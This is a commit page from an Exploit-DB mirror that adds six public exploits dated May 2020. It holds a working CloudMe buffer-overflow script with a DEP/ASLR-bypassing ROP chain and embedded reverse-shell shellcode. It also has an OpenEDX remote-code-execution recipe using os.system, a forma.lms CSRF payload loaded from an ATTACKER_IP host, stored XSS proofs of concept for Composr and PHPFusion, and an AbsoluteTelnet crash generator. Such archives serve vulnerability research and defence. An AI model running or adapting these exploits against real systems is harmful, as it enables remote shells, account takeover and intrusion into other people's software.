bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1

DB: 2020-05-22

Browse source 
6 changes to exploits/shellcodes

AbsoluteTelnet 11.21 - 'Username' Denial of Service (PoC)

CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)
forma.lms 5.6.40 - Cross-Site Request Forgery (Change Admin Email)
Composr CMS 10.0.30 - Persistent Cross-Site Scripting
PHPFusion 9.03.50 - Persistent Cross-Site Scripting
OpenEDX platform Ironwood 2.5 - Remote Code Execution
This commit is contained in:
Offensive Security 2020-05-22 05:01:54 +00:00
parent b76fd66d1f
commit b6194a254f
7 changed files with 421 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

44
exploits/multiple/webapps/48500.txt Normal file
View file

@ -0,0 +1,44 @@
# Exploit Title: OpenEDX platform Ironwood 2.5 - Remote Code Execution
# Google Dork: N/A
# Date: 2020-05-20
# Exploit Author: Daniel Monzón (stark0de)
# Vendor Homepage: https://open.edx.org/
# Software Link: https://github.com/edx/edx-platform
# Version: Ironwood 2.5
# Tested on: Debian x64
# CVE : CVE-2020-13144
CVE ID: CVE-2020-13144
OpenEDX Platform Ironwood version 2.5 suffers from a RCE vulnerability when the use of CodeJail (https://github.com/edx/codejail) is not enforced
This is an authenticated vulnerability, so you need to register an account, go to /edx-studio
Then Create New course > New section > New subsection > New unit > Add new component > Problem button > Advanced tab > Custom Python evaluated code
Once here we just need to edit the problem and introduce a payload such as:
<problem>
<script type="python">
def test_add(expect,ans):
import os
os.system("thecommandyouwanttoexecute")
</script>
<p>Problem text</p>
<customresponse cfn="test_add" expect="20">
<textline size="10" correct_answer="11" label="Integer #1"/><br/>
<textline size="10" correct_answer="9" label="Integer #2"/>
</customresponse>
<solution>
<div class="detailed-solution">
<p>Solution or Explanation Heading</p>
<p>Solution or explanation text</p>
</div>
</solution>
</problem>
And click Submit, and you will execute commands in the machine

47
exploits/php/webapps/48494.txt Normal file
View file

@ -0,0 +1,47 @@
# Exploit Title: forma.lms 5.6.40 - Cross-Site Request Forgery (Change Admin Email)
# Date: 2020-05-21
# Exploit Author: Daniel Ortiz
# Vendor Homepage: https://sourceforge.net/projects/forma/
# Tested on: XAMPP for Linux 64bit 5.6.40-0
## 1 - Description
- Vulnerable form: Edit Profile
- Details: The validation of the CSRF token depends on request method. Changing the request method from POST to GET the token validation is omitted by the backend.
- Privileges: It requires admin privileges to change the admin email.
- Location: Admin Area >user profile > Edit form
- Endopoint: /formalms/appCore/index.php?r=lms/profile/show&ap=saveinfo
## 2 -Triggering the Vulnerability
To trigger this vulnerability the admin user must log in to the system.
1) Setup a HTTP server on the attacker machine, e.g: python -m SimpleHTTPServer 9090
2) In the attacker machine create a file with this content:
[+] payload.js
var target = document.location.host;
var params = "r=lms/profile/show&ap=saveinfo&authentic_request=&up_lastname=&up_firstname=&up_email=hacked@admin.com&user_preference[ui.language]=0&up_signature=&save=Save+changes";
function pwnEmail(){
var xhr = new XMLHttpRequest();
xhr.open("GET", "http://" + target + "/formalms/appLms/index.php?"+params, true);
xhr.send(null);
}
pwnEmail();
3) Edit a course and in the description field put this payload:
<script src="http://ATTACKER_IP:PORT/payload.js"/>
The description field is vulnerable to XSS attacks and is used to trigger the csrf payload.
4) Go to index page in formalms/appLms/index.php?r=lms/mycourses/show this trigger the XSS payload in the description field (the payload loads the payload.js file and execute the CSRF payload)
5) The payload.js file is executed and the admin email is changed

90
exploits/php/webapps/48496.txt Normal file
View file

@ -0,0 +1,90 @@
# Title: Composr CMS 10.0.30 - Persistent Cross-Site Scripting
# Author: Manuel Garcia Cardenas
# Date: 2020-02-06
# Vendor: https://compo.sr/
# CVE: N/A
=============================================
MGC ALERT 2020-001
- Original release date: February 06, 2020
- Last revised: May 21, 2020
- Discovered by: Manuel Garcia Cardenas
- Severity: 4,8/10 (CVSS Base Score)
- CVE-ID: CVE-2020-8789
=============================================
I. VULNERABILITY
-------------------------
Composr CMS 10.0.30 - (Authenticated) Cross-Site Scripting
II. BACKGROUND
-------------------------
Composr CMS (or Composr) is a web application for creating websites. It is
a combination of a Web content management system and Online community
(Social Networking) software. Composr is licensed as free software and
primarily written in the PHP programming language.
III. DESCRIPTION
-------------------------
Has been detected a Persistent XSS vulnerability in Composr CMS, that
allows the execution of arbitrary HTML/script code to be executed in the
context of the victim user's browser.
IV. PROOF OF CONCEPT
-------------------------
Go to: Security -> Usergroups -> Edit Usergroup
Select one Usergroup (for example Guest) and edit the Name (parameter name)
for example with Guests"><script>alert(1)</script>
The variable "name" it is not sanitized, later, if some user visit the
"Zone editor" area, the XSS is executed, in the response you can view:
<input type="hidden" name="label_for__access_1" value="Access for
Guests"><script>alert(1)</script>" />
V. BUSINESS IMPACT
-------------------------
An attacker can execute arbitrary HTML or Javascript code in a targeted
user's browser, this can leverage to steal sensitive information as user
credentials, personal data, etc.
VI. SYSTEMS AFFECTED
-------------------------
Composr CMS <= 10.0.30
VII. SOLUTION
-------------------------
Disable until a fix is available.
VIII. REFERENCES
-------------------------
https://compo.sr/
IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).
X. REVISION HISTORY
-------------------------
February 06, 2020 1: Initial release
May 21, 2020 2: Last revision
XI. DISCLOSURE TIMELINE
-------------------------
February 06, 2020 1: Vulnerability acquired by Manuel Garcia Cardenas
February 06, 2020 2: Send to vendor
April 06, 2020 3: New request, vendor doesn't answer.
May 21, 2020 4: Sent to lists
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester

78
exploits/php/webapps/48497.txt Normal file
View file

@ -0,0 +1,78 @@
# Exploit Title: PHPFusion 9.03.50 - Persistent Cross-Site Scripting
# Date: 2020-05-20
# Exploit Author: coiffeur
# Vendor Homepage: https://www.php-fusion.co.uk/home.php
# Software Link: https://www.php-fusion.co.uk/php_fusion_9_downloads.php
# Version: v9.03.50
## How?
When creating a thread or editing one of his messages with HTML content, it turns out that the injected characters are correctly escaped as it can be seen when I tried here to fuzz the message field with the string `i<3"'ivoire`.
https://therealcoiffeur.github.io/captures/c5_1.png
https://therealcoiffeur.github.io/captures/c5_2.png
https://therealcoiffeur.github.io/captures/c5_3.png
It's when I became interested in the print feature that things turned out to be interesting. Indeed, the print function allows you to simplify the page as much as possible so that it contains only text. So the print function returns all messages in text format so that the content of a thread can be easily printed (in order to generate this result it is necessary to click on the button circled in blue in figure 3).
![alt text](../captures/c5_4.png "Figure 5: Injection of HTML character (part 3)")
![alt text](../captures/c5_5.png "Figure 6: Injection of HTML character (part 3)")
Once the page is generated by the print functionality we realize by analyzing the body of the server response, that our characters are no longer sanitized.
Now we just have to create a message that will allow us to execute JavaScript by replacing the contents of the previous message with:
```html
<img onerror="alert(1)" src=xxx>
```
https://therealcoiffeur.github.io/captures/c5_4.png
https://therealcoiffeur.github.io/captures/c5_5.png
## Why?
The route requested to generate this result is the route <span style="color:red">\<ROOT\>/print.php?type=F&item_id=1&rowstart=0</span>. It is thus page <span style="color:red">\<ROOT\>/print.php</span> which is called, with the following parameters:
```
$_GET array (size=3)
'type' => string 'F' (length=1)
'item_id' => string '1' (length=1)
'rowstart' => string '0' (length=1)
```
File: <span style="color:red">\<ROOT\>/print.php</span>
```php
...
case "F":
...
echo parse_textarea($data['post_message']);
...
```
File: <span style="color:red">\<ROOT\>/includes/core_functions_include.php</span>
```php
function parse_textarea($text, $smileys = TRUE, $bbcode = TRUE, $decode = TRUE, $default_image_folder = IMAGES, $add_line_breaks = FALSE, $descript = TRUE) {
$text = $decode == TRUE ? html_entity_decode(stripslashes($text), ENT_QUOTES, fusion_get_locale('charset')) : $text;
$text = $decode == TRUE ? html_entity_decode($text, ENT_QUOTES, fusion_get_locale('charset')) : $text; // decode for double encoding.
$text = !empty($default_image_folder) ? parse_imageDir($text, $default_image_folder) : $text;
$text = $smileys == TRUE ? parsesmileys($text) : $text;
$text = $bbcode == TRUE ? parseubb($text) : $text;
$text = fusion_parse_user($text);
$text = $add_line_breaks ? nl2br($text) : $text;
$text = $descript == TRUE ? descript($text) : $text;
return (string)$text;
}
```
As you can see by reading the function code of `parse_textarea()`, the text is not sanitized, which leads to the Stored XSS.

30
exploits/windows/dos/48493.py Executable file
View file

@ -0,0 +1,30 @@
# Exploit Title: AbsoluteTelnet 11.21 - 'Username' Denial of Service (PoC)
# Discovered by: Xenofon Vassilakopoulos
# Discovered Date: 2020-05-21
# Vendor Homepage: https://www.celestialsoftware.net/
# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.21.exe
# Tested Version: 11.21
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 7 Professional x86 SP1
# Description: AbsoluteTelnet 11.21 - 'SHA2/Username' and 'Send Error Report' Denial of Service (PoC)
# Steps to reproduce:
# 1. - Run python script
# 2. - Open absolutetelnet.txt and copy content to clipboard
# 3. - Open AbsoluteTelnet 11.21
# 4. - Select "new connection file -> Connection -> SSH2"
# 5. - Paste the contents at the field "Authentication -> Username"
# 6. - press "ok" button
# 7. - Crashed
# 8. - Reopen AbsoluteTelnet 11.21
# 9. - A new window will appear that prompts you to send an error report
# 10.- Open absolutetelnet.txt and copy content to clipboard
# 11.- Paste the contents at the field "Your Email Address (optional)"
# 12.- press "Send Error Report" button
# 13.- Crashed
buf = "\x41" * 1000
f = open ("absolutetelnet.txt", "w")
f.write(buf)
f.close()

126
exploits/windows/local/48499.txt Normal file
View file

@ -0,0 +1,126 @@
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (SEH,DEP,ASLR)
# Date: 2020-05-20
# Exploit Author: Xenofon Vassilakopoulos
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 7 Professional x86 SP1
# Steps to reproduce:
# 1. On your local machine start the CloudMe service.
# 2. change the reverse tcp shellcode using the IP and Port of your host using the following command
# msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> EXITFUNC=thread -b "\x00\x0d\x0a" -f python
# 3. Run the python script.
import struct
import socket
target = "127.0.0.1"
########################################################################
# Get kernel32 address from the stack
# 0022ff8c 77883c45 kernel32!BaseThreadInitThunk+0xe
rop = struct.pack('L',0x699012c9) # POP EBP # RETN [Qt5Network.dll]
rop+= struct.pack('L',0x0385FF88) # Offset
rop+= struct.pack('L',0x68a9559e) # XCHG EAX,EBP # RETN [Qt5Core.dll]
rop+= struct.pack('L',0x68ae4fe3) # POP ECX # RETN [Qt5Core.dll]
rop+= struct.pack('L',0x0362fffc) # Offset
rop+= struct.pack('L',0x68ad422b) # SUB EAX,ECX # RETN [Qt5Core.dll]
rop+= struct.pack('L',0x68ae8a22) # MOV EAX,DWORD PTR [EAX] # RETN [Qt5Core.dll]
# Calculate VirtualProtect relative to the leaked kernel32 address
rop+= struct.pack('L',0x68a812c9) # POP EBP # RETN [Qt5Core.dll]
rop+= struct.pack('L',0xfffae493) # Offset
rop+= struct.pack('L',0x61ba8137) # ADD EAX,EBP # RETN [Qt5Gui.dll]
########################################################################
# Setup VirtualProtect
# edi
rop+= struct.pack('L',0x6d9c23ab) # POP EDI # RETN [Qt5Sql.dll]
rop+= struct.pack('L',0x6d9c1011) # RETN (ROP NOP) [Qt5Sql.dll]
# esi
rop+= struct.pack('L',0x61b63b3c) # XCHG EAX, ESI # RETN # ptr to virtualprotect
# edx
rop+= struct.pack('L',0x68d327ff) # POP EAX # POP ECX # RETN [Qt5Core.dll]
rop+= struct.pack('L',0xffffffc0) # Value to negate, will become 0x00000040
rop+= struct.pack('L',0x41414141) # Filler
rop+= struct.pack('L',0x68cef5b2) # NEG EAX # RETN [Qt5Core.dll]
rop+= struct.pack('L',0x68b1df17) # XCHG EAX,EDX # RETN [Qt5Core.dll]
# ebx
rop+= struct.pack('L',0x68ae7ee3) # POP EAX # RETN [Qt5Core.dll]
rop+= struct.pack('L',0xfffffdff) # Value to negate, will become 0x00000201
rop+= struct.pack('L',0x6d9e431a) # NEG EAX # RETN [Qt5Sql.dll]
rop+= struct.pack('L',0x68aad07c) # XCHG EAX,EBX # RETN [Qt5Core.dll]
# ebp
rop+= struct.pack('L',0x6d9c12c9) # POP EBP # RETN [Qt5Sql.dll]
rop+= struct.pack('L',0x6d9c12c9) # skip 4 bytes
# eax & ecx
rop+= struct.pack('L',0x6fe4dc57) # POP EAX # POP ECX # RETN [libstdc++-6.dll]
rop+= struct.pack('L',0x90909090) # NOP
rop+= struct.pack('L',0x68ee6b16) # &Writable location [Qt5Core.dll]
# push registers to stack
rop+= struct.pack('L',0x68ef1b07) # PUSHAD # RETN [Qt5Core.dll]
rop+= struct.pack('L',0x64b4d6cd) # JMP ESP [libwinpthread-1.dll]
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.6 LPORT=443 EXITFUNC=thread -b "\x00\x0d\x0a" -f python
buf = b""
buf += b"\xbf\xa4\x90\x9d\x67\xd9\xc7\xd9\x74\x24\xf4\x5a\x31"
buf += b"\xc9\xb1\x52\x31\x7a\x12\x83\xc2\x04\x03\xde\x9e\x7f"
buf += b"\x92\xe2\x77\xfd\x5d\x1a\x88\x62\xd7\xff\xb9\xa2\x83"
buf += b"\x74\xe9\x12\xc7\xd8\x06\xd8\x85\xc8\x9d\xac\x01\xff"
buf += b"\x16\x1a\x74\xce\xa7\x37\x44\x51\x24\x4a\x99\xb1\x15"
buf += b"\x85\xec\xb0\x52\xf8\x1d\xe0\x0b\x76\xb3\x14\x3f\xc2"
buf += b"\x08\x9f\x73\xc2\x08\x7c\xc3\xe5\x39\xd3\x5f\xbc\x99"
buf += b"\xd2\x8c\xb4\x93\xcc\xd1\xf1\x6a\x67\x21\x8d\x6c\xa1"
buf += b"\x7b\x6e\xc2\x8c\xb3\x9d\x1a\xc9\x74\x7e\x69\x23\x87"
buf += b"\x03\x6a\xf0\xf5\xdf\xff\xe2\x5e\xab\x58\xce\x5f\x78"
buf += b"\x3e\x85\x6c\x35\x34\xc1\x70\xc8\x99\x7a\x8c\x41\x1c"
buf += b"\xac\x04\x11\x3b\x68\x4c\xc1\x22\x29\x28\xa4\x5b\x29"
buf += b"\x93\x19\xfe\x22\x3e\x4d\x73\x69\x57\xa2\xbe\x91\xa7"
buf += b"\xac\xc9\xe2\x95\x73\x62\x6c\x96\xfc\xac\x6b\xd9\xd6"
buf += b"\x09\xe3\x24\xd9\x69\x2a\xe3\x8d\x39\x44\xc2\xad\xd1"
buf += b"\x94\xeb\x7b\x75\xc4\x43\xd4\x36\xb4\x23\x84\xde\xde"
buf += b"\xab\xfb\xff\xe1\x61\x94\x6a\x18\xe2\x5b\xc2\x23\xf4"
buf += b"\x33\x11\x23\xf9\x78\x9c\xc5\x93\x6e\xc9\x5e\x0c\x16"
buf += b"\x50\x14\xad\xd7\x4e\x51\xed\x5c\x7d\xa6\xa0\x94\x08"
buf += b"\xb4\x55\x55\x47\xe6\xf0\x6a\x7d\x8e\x9f\xf9\x1a\x4e"
buf += b"\xe9\xe1\xb4\x19\xbe\xd4\xcc\xcf\x52\x4e\x67\xed\xae"
buf += b"\x16\x40\xb5\x74\xeb\x4f\x34\xf8\x57\x74\x26\xc4\x58"
buf += b"\x30\x12\x98\x0e\xee\xcc\x5e\xf9\x40\xa6\x08\x56\x0b"
buf += b"\x2e\xcc\x94\x8c\x28\xd1\xf0\x7a\xd4\x60\xad\x3a\xeb"
buf += b"\x4d\x39\xcb\x94\xb3\xd9\x34\x4f\x70\xf9\xd6\x45\x8d"
buf += b"\x92\x4e\x0c\x2c\xff\x70\xfb\x73\x06\xf3\x09\x0c\xfd"
buf += b"\xeb\x78\x09\xb9\xab\x91\x63\xd2\x59\x95\xd0\xd3\x4b"
##########
junk1 = "\x41"*1604
nops = "\x90"*16
junk2 = "C"*(2236 - len(nops) - len(buf) - len(rop) - len(junk1))
seh = struct.pack('L',0x6998fb2e) # ADD ESP,76C # POP EBX # POP ESI # POP EDI # POP EBP # RETN [Qt5Network.dll]
payload = junk1 + rop + nops + buf + junk2 + seh
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,8888))
s.send(payload)
except Exception as e:
print(sys.exc_value)

6
files_exploits.csv
View file

@ -6732,6 +6732,7 @@ id,file,description,date,author,type,platform,port
48402,exploits/windows/dos/48402.py,"VirtualTablet Server 3.0.2 - Denial of Service (PoC)",2020-05-01,"Dolev Farhi",dos,windows,
48434,exploits/windows/dos/48434.py,"FlashGet 1.9.6 - Denial of Service (PoC)",2020-05-07,"Milad karimi",dos,windows,
48441,exploits/hardware/dos/48441.sh,"Extreme Networks Aerohive HiveOS 11.0 - Remote Denial of Service (PoC)",2020-05-08,LiquidWorm,dos,hardware,
48493,exploits/windows/dos/48493.py,"AbsoluteTelnet 11.21 - 'Username' Denial of Service (PoC)",2020-05-21,"Xenofon Vassilakopoulos",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -11074,6 +11075,7 @@ id,file,description,date,author,type,platform,port
48469,exploits/windows/local/48469.py,"Dameware Remote Support 12.1.1.273 - Buffer Overflow (SEH)",2020-05-14,gurbanli,local,windows,
48461,exploits/windows/local/48461.py,"LanSend 3.2 - Buffer Overflow (SEH)",2020-05-12,gurbanli,local,windows,
48464,exploits/macos/local/48464.py,"MacOS 320.whatis Script - Privilege Escalation",2020-05-12,"Csaba Fitzl",local,macos,
48499,exploits/windows/local/48499.txt,"CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)",2020-05-21,"Xenofon Vassilakopoulos",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -42722,3 +42724,7 @@ id,file,description,date,author,type,platform,port
48489,exploits/php/webapps/48489.txt,"NukeViet VMS 4.4.00 - Cross-Site Request Forgery (Change Admin Password)",2020-05-19,JEBARAJ,webapps,php,
48490,exploits/php/webapps/48490.txt,"Victor CMS 1.0 - Authenticated Arbitrary File Upload",2020-05-19,"Kishan Lal Choudhary",webapps,php,
48492,exploits/php/webapps/48492.py,"CraftCMS 3 vCard Plugin 1.0.0 - Remote Code Execution",2020-05-20,"Wade Guest",webapps,php,
48494,exploits/php/webapps/48494.txt,"forma.lms 5.6.40 - Cross-Site Request Forgery (Change Admin Email)",2020-05-21,"Daniel Ortiz",webapps,php,
48496,exploits/php/webapps/48496.txt,"Composr CMS 10.0.30 - Persistent Cross-Site Scripting",2020-05-21,"Manuel García Cárdenas",webapps,php,
48497,exploits/php/webapps/48497.txt,"PHPFusion 9.03.50 - Persistent Cross-Site Scripting",2020-05-21,coiffeur,webapps,php,
48500,exploits/multiple/webapps/48500.txt,"OpenEDX platform Ironwood 2.5 - Remote Code Execution",2020-05-21,"Daniel Monzón",webapps,multiple,

Can't render this file because it is too large.